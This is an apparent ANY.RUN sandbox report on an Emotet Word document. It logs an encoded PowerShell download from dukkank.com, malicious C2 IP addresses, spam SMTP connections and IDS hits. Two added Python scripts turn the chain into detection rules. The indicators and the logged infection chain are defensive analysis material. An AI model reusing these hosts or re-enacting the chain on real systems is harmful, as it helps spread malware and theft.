Field | Value
---|---|
File name | Factura_B8151034.doc
Full analysis | https://app.any.run/tasks/52349be0-23ca-4a68-86b4-9505c4faa639
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It targets mostly corporate victims, but private users also get infected through its mass spam email campaigns.
Analysis date | April 25, 2019, 18:50:41
OS | Windows 7 Professional Service Pack 1 (build 7601, 32-bit)
Tags | —
Indicators | —
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 25 13:01:00 2019, Last Saved Time/Date: Thu Apr 25 13:01:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0
MD5 | 6D9A875C59118BCA4576DBE81F347503
SHA1 | BFD2A5E5A4E79D3B3585847A326D53C65AA8E6D3
SHA256 | 225ED35D667AFBE8896F3E78476B8D80E569313E37F2F6E661B602A5399DEADE
SSDEEP | 6144:b77HUUUUUUUUUUUUUUUUUUUT52VjSy0h0ZB7dhxebp:b77HUUUUUUUUUUUUUUUUUUUTCeyKaB7+
Extension | Description | Match (%)
---|---|---|
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Property | Value
---|---|
Title | —
Subject | —
Author | —
Keywords | —
Comments | —
Template | Normal.dotm
LastModifiedBy | —
RevisionNumber | 1
Software | Microsoft Office Word
TotalEditTime | —
CreateDate | 2019:04:25 12:01:00
ModifyDate | 2019:04:25 12:01:00
Pages | 1
Words | —
Characters | 5
Security | None
CodePage | Windows Latin 1 (Western European)
Company | —
Lines | 1
Paragraphs | 1
CharCountWithSpaces | 5
AppVersion | 16
ScaleCrop | No
LinksUpToDate | No
SharedDoc | No
HyperlinksChanged | No
TitleOfParts | —
HeadingPairs | —
CompObjUserTypeLen | 32
CompObjUserType | Microsoft Word 97-2003 Document
PID | CMD | Path | Indicators | Parent process | User / integrity / exit code
---|---|---|---|---|---|
2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Factura_B8151034.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
2592 | powershell -e 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3176 | "C:\Users\admin\38.exe" | C:\Users\admin\38.exe | — | powershell.exe | User: admin; Integrity level: MEDIUM; Exit code: 0
4080 | --f33b820f | C:\Users\admin\38.exe | | 38.exe | User: admin; Integrity level: MEDIUM; Exit code: 0
3424 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | | 38.exe | User: admin; Integrity level: MEDIUM; Exit code: 0
3988 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | | soundser.exe | User: admin; Integrity level: MEDIUM; Exit code: 0
2284 | "C:\Users\admin\AppData\Local\soundser\xXTNd2.exe" | C:\Users\admin\AppData\Local\soundser\xXTNd2.exe | — | soundser.exe | User: admin; Integrity level: MEDIUM; Exit code: 0
2924 | --cb6dfdcf | C:\Users\admin\AppData\Local\soundser\xXTNd2.exe | | xXTNd2.exe | User: admin; Integrity level: MEDIUM; Exit code: 0
2344 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | | xXTNd2.exe | User: admin; Integrity level: MEDIUM; Exit code: 0
3248 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | | soundser.exe | User: admin; Integrity level: MEDIUM
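The process table shows the chain a detection engineer has to catch: WINWORD.EXE opens the document, an encoded `powershell -e` appears with wmiprvse.exe (not Word) as its parent, PowerShell launches 38.exe from the user profile, 38.exe relaunches itself with an argument of `--` plus eight hex digits, and the same binary is copied to `%LOCALAPPDATA%\soundser\soundser.exe`, which repeats the self-launch pattern. The practical caveat is the parent: because the macro went through WMI, a rule keyed only on Office spawning PowerShell never fires here. The script below is an added example, not code from ANY.RUN or from the report; the events are hand-copied from the table (constructed input, with the redacted encoded command left as a placeholder), and the event schema, rule names and the combination used for the final verdict are my own assumptions.

```python
"""Process-chain checks for the process table above.

Added example, not part of the ANY.RUN report: the events are copied by
hand from the table (constructed input), and the field names, rule names
and the verdict combination are my own assumptions, not a vendor schema.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the started process
    cmdline: str        # command line as logged
    parent_image: str   # image name (or path) of the parent


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# The dropped binary relaunches itself with a single argument: "--" plus 8 hex digits.
RESPAWN_ARG = re.compile(r"^--[0-9a-f]{8}$", re.I)
USER_PROFILE_EXE = re.compile(r"^c:\\users\\[^\\]+\\.*\.exe$", re.I)
# %LOCALAPPDATA%\<name>\<name>.exe, e.g. ...\AppData\Local\soundser\soundser.exe
LOCALAPPDATA_SAME_NAME = re.compile(
    r"^c:\\users\\[^\\]+\\appdata\\local\\([^\\]+)\\\1\.exe$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...)."""
    t = token.lower()
    return t == "-ec" or (len(t) >= 2 and "-encodedcommand".startswith(t))


def evaluate(ev: ProcEvent) -> set:
    """Return the names of the rules a single process-creation event trips."""
    img, par = basename(ev.image), basename(ev.parent_image)
    args = ev.cmdline.split()
    hits = set()
    if img in SCRIPT_HOSTS and par in OFFICE_APPS:
        hits.add("office_spawns_script_host")
    # In this report Word is never PowerShell's parent: the macro used WMI, so the
    # parent is wmiprvse.exe. Keying only on WINWORD.EXE -> powershell.exe misses it.
    if img == "powershell.exe" and par == "wmiprvse.exe":
        hits.add("wmi_spawned_powershell")
    if img == "powershell.exe" and any(is_encoded_flag(a) for a in args[1:]):
        hits.add("encoded_powershell")
    if par in SCRIPT_HOSTS and USER_PROFILE_EXE.match(ev.image):
        hits.add("script_host_runs_user_profile_exe")
    if img == par and len(args) == 1 and RESPAWN_ARG.match(args[0]):
        hits.add("self_respawn_hex_arg")
    if LOCALAPPDATA_SAME_NAME.match(ev.image):
        hits.add("localappdata_same_name_dir")
    return hits


def summarize(events) -> dict:
    """Map each tripped rule to the PIDs that tripped it, in table order."""
    out = {}
    for ev in events:
        for rule in sorted(evaluate(ev)):
            out.setdefault(rule, []).append(ev.pid)
    return out


def is_emotet_like_chain(events) -> bool:
    """Office/WMI initial stage -> encoded PowerShell -> user-profile EXE that respawns itself."""
    rules = set(summarize(events))
    initial = {"office_spawns_script_host", "wmi_spawned_powershell"} & rules
    later = {"encoded_powershell", "script_host_runs_user_profile_exe", "self_respawn_hex_arg"}
    return bool(initial) and later <= rules


# Constructed from the process table; the encoded command is redacted in the report.
EVENTS = [
    ProcEvent(2944, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
              r'"C:\Users\admin\AppData\Local\Temp\Factura_B8151034.doc"', "explorer.exe"),
    ProcEvent(2592, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -e <redacted>", "wmiprvse.exe"),
    ProcEvent(3176, r"C:\Users\admin\38.exe", r'"C:\Users\admin\38.exe"', "powershell.exe"),
    ProcEvent(4080, r"C:\Users\admin\38.exe", "--f33b820f", "38.exe"),
    ProcEvent(3424, r"C:\Users\admin\AppData\Local\soundser\soundser.exe",
              r'"C:\Users\admin\AppData\Local\soundser\soundser.exe"', "38.exe"),
    ProcEvent(3988, r"C:\Users\admin\AppData\Local\soundser\soundser.exe",
              "--3ab57678", "soundser.exe"),
]

if __name__ == "__main__":
    for rule, pids in sorted(summarize(EVENTS).items()):
        print(f"{rule:36} {pids}")
    print("emotet-like chain:", is_emotet_like_chain(EVENTS))
```

The per-event rules are deliberately independent so that a single one (WMI provider host launching an encoded PowerShell, or a binary under the user profile relaunching itself with an 8-hex-digit argument) is already worth an alert on its own; the chain verdict only combines them. The file table further down corroborates the macro stage: WINWORD.EXE writing `Temp\VBE\MSForms.exd` is the usual trace of a VBA project loading the MSForms library, even though Word itself never spawns a child process here.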
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---|
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFBBD.tmp.cvr | — | — | —
2592 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\03FZ5XJCRTUCR8F5EFUZ.temp | — | — | —
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 04ADB635A4FA53E289E4CC8225503A85 | B5E3E3539685926AE4AB71F1A24674F3225BCA0F1A9896448A1F1AB2F214C605
2592 | powershell.exe | C:\Users\admin\38.exe | executable | 3F5A7865E0EE668A2BFFCA64CBF127CD | 9C38B0B64EB091EB10521EE5A602940020AFA164615CC93898E771DFF24C97CE
4080 | 38.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | 3F5A7865E0EE668A2BFFCA64CBF127CD | 9C38B0B64EB091EB10521EE5A602940020AFA164615CC93898E771DFF24C97CE
2924 | xXTNd2.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | C269F0952FD0EE6C8AAA2C895B51F1CE | C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384
2592 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF130591.TMP | binary | 5F9A7BF5388376D94C2EDCA422810BEC | 8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | DD77464B526F44FEC4F1D7A61F3F945D | 72BE40270A48CC57DA0CD3536CBE09472B020C3B56ADED8DAC653463400BEC19
3988 | soundser.exe | C:\Users\admin\AppData\Local\soundser\xXTNd2.exe | executable | C269F0952FD0EE6C8AAA2C895B51F1CE | C5A51343901F1FA017AA35CA81D3D3894513377FE3FC3637EAEF90159BCAF384
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ctura_B8151034.doc | pgc | 6541BD882F41DA50C9B478123A518005 | 9F5B477EA233147D13515EF2198FA504D3B29D9B4DE266FB3B7F538C77C1C612
PID | Process | Method | HTTP status | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---|
3248 | soundser.exe | GET | — | 31.172.86.183:8080 | http://31.172.86.183:8080/whoami.php | DE | — | — | malicious
3248 | soundser.exe | POST | — | 31.172.86.183:8080 | http://31.172.86.183:8080/arizona/ | DE | — | — | malicious
2592 | powershell.exe | GET | 200 | 165.227.97.68:80 | http://dukkank.com/wp-admin/Uh4/ | US | executable | 134 KB | suspicious
3248 | soundser.exe | POST | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/between/merge/ringin/merge/ | US | binary | 122 KB | malicious
3988 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/symbols/odbc/ringin/ | CA | binary | 67.6 KB | malicious
3248 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/attrib/window/ | CA | binary | 148 B | malicious
3248 | soundser.exe | POST | 200 | 216.98.148.157:8080 | http://216.98.148.157:8080/entries/enabled/ringin/ | US | binary | 148 B | malicious
3248 | soundser.exe | GET | 200 | 104.236.185.25:8080 | http://104.236.185.25:8080/whoami.php | US | text | 14 B | malicious
3248 | soundser.exe | GET | 200 | 216.98.148.157:8080 | http://216.98.148.157:8080/whoami.php | US | text | 14 B | malicious
3248 | soundser.exe | POST | 200 | 24.150.44.53:80 | http://24.150.44.53/img/ | CA | binary | 894 KB | malicious
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3248 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
3988 | soundser.exe | 24.150.44.53:80 | — | Cogeco Cable | CA | malicious |
2592 | powershell.exe | 165.227.97.68:80 | dukkank.com | Digital Ocean, Inc. | US | suspicious |
3248 | soundser.exe | 188.125.73.26:587 | smtp.mail.yahoo.com | — | CH | unknown |
3248 | soundser.exe | 31.172.86.183:8080 | — | First Colo GmbH | DE | malicious |
3248 | soundser.exe | 216.98.148.157:8080 | — | CariNet, Inc. | US | malicious |
3248 | soundser.exe | 104.236.185.25:8080 | — | Digital Ocean, Inc. | US | malicious |
3248 | soundser.exe | 184.173.151.165:25 | mail.pincol.com.br | SoftLayer Technologies Inc. | US | unknown |
3248 | soundser.exe | 67.227.144.240:465 | mail.supernatura.com.mx | Liquid Web, L.L.C | US | unknown |
3248 | soundser.exe | 188.125.73.26:465 | smtp.mail.yahoo.com | — | CH | unknown |
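The HTTP and connection tables above carry three behaviours that hold up even when, unlike here, no Feodo Tracker entry matches the C2 address: PowerShell fetching an executable from a compromised WordPress path, soundser.exe POSTing to literal IP addresses on 80/8080 and issuing `GET /whoami.php` to the same sockets, and the same process opening SMTP sessions (25/465/587) to several mail servers, which is the spam module at work. The script below is an added example and not code from ANY.RUN or the report; the records are hand-copied from the two tables (constructed input), and the process allow-lists, the two-server threshold and the rule names are my own assumptions.

```python
"""Network heuristics over the HTTP-request and connection tables above.

Added example, not part of the ANY.RUN report. The records are copied by
hand from the two tables (constructed input); the process allow-lists,
thresholds and rule names are my own assumptions.
"""
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
SMTP_PORTS = {25, 465, 587}

# (pid, process, method, url, response type) copied from the HTTP table
HTTP = [
    (3248, "soundser.exe", "GET", "http://31.172.86.183:8080/whoami.php", None),
    (3248, "soundser.exe", "POST", "http://31.172.86.183:8080/arizona/", None),
    (2592, "powershell.exe", "GET", "http://dukkank.com/wp-admin/Uh4/", "executable"),
    (3248, "soundser.exe", "POST", "http://104.236.185.25:8080/between/merge/ringin/merge/", "binary"),
    (3988, "soundser.exe", "POST", "http://24.150.44.53/symbols/odbc/ringin/", "binary"),
    (3248, "soundser.exe", "POST", "http://24.150.44.53/attrib/window/", "binary"),
    (3248, "soundser.exe", "POST", "http://216.98.148.157:8080/entries/enabled/ringin/", "binary"),
    (3248, "soundser.exe", "GET", "http://104.236.185.25:8080/whoami.php", "text"),
    (3248, "soundser.exe", "GET", "http://216.98.148.157:8080/whoami.php", "text"),
    (3248, "soundser.exe", "POST", "http://24.150.44.53/img/", "binary"),
]
# (pid, process, ip, port, domain) copied from the connections table, SMTP rows only
CONNS = [
    (3248, "soundser.exe", "188.125.73.26", 587, "smtp.mail.yahoo.com"),
    (3248, "soundser.exe", "184.173.151.165", 25, "mail.pincol.com.br"),
    (3248, "soundser.exe", "67.227.144.240", 465, "mail.supernatura.com.mx"),
    (3248, "soundser.exe", "188.125.73.26", 465, "smtp.mail.yahoo.com"),
]


def is_literal_ip(host) -> bool:
    """True when the URL host is a bare IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def http_findings(records) -> list:
    """Per-request rules, returned as (pid, rule, detail) tuples."""
    out = []
    for pid, proc, method, url, rtype in records:
        u = urlsplit(url)
        sock = f"{u.hostname}:{u.port or (443 if u.scheme == 'https' else 80)}"
        p = proc.lower()
        if p in SCRIPT_HOSTS and rtype == "executable":
            out.append((pid, "script_host_downloads_exe", url))
        if p not in BROWSERS and is_literal_ip(u.hostname):
            if method == "POST":
                out.append((pid, "post_to_literal_ip", sock))
            elif u.path.endswith("/whoami.php"):
                out.append((pid, "whoami_probe", sock))
    return out


def c2_sockets(records) -> list:
    """ip:port pairs that received POSTs from a non-browser: the blocklist candidates."""
    return sorted({d for _, rule, d in http_findings(records) if rule == "post_to_literal_ip"})


def smtp_findings(conns, min_servers=2) -> dict:
    """Non-mail processes talking SMTP to several distinct servers (spam-module behaviour)."""
    servers = defaultdict(set)
    for pid, proc, ip, port, domain in conns:
        if port in SMTP_PORTS and proc.lower() not in MAIL_CLIENTS:
            servers[(pid, proc)].add(domain or ip)
    return {k: sorted(v) for k, v in servers.items() if len(v) >= min_servers}


if __name__ == "__main__":
    for finding in http_findings(HTTP):
        print(finding)
    print("C2 sockets:", c2_sockets(HTTP))
    print("SMTP:", smtp_findings(CONNS))
```

The `c2_sockets` list is what goes into an egress block; the POST-to-literal-IP rule is kept separate from the `whoami.php` probe because the latter alone is a weak signal, while a non-browser process POSTing binary bodies to a bare IP on 8080 is rarely legitimate. The DNS table below, with lookups for smtp.gmail.com, smtp.live.com, mail.comcast.net and similar, is the same spam-module activity seen before the connections are made.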
Domain | IP | Reputation
---|---|---|
dukkank.com | | suspicious
mail.pincol.com.br | | unknown
mail.supernatura.com.mx | | unknown
smtp.secureserver.net | | shared
smtp.juno.com | | shared
smtp.mail.yahoo.com | | shared
mail.comcast.net | | shared
smtp.live.com | | shared
smtp.gmail.com | | shared
pop.speedy.com.ar | | unknown
PID | Process | Class | Message |
---|---|---|---|
2592 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2592 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2592 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3988 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 17 |
3988 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3248 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3248 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3248 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3248 | soundser.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
3248 | soundser.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |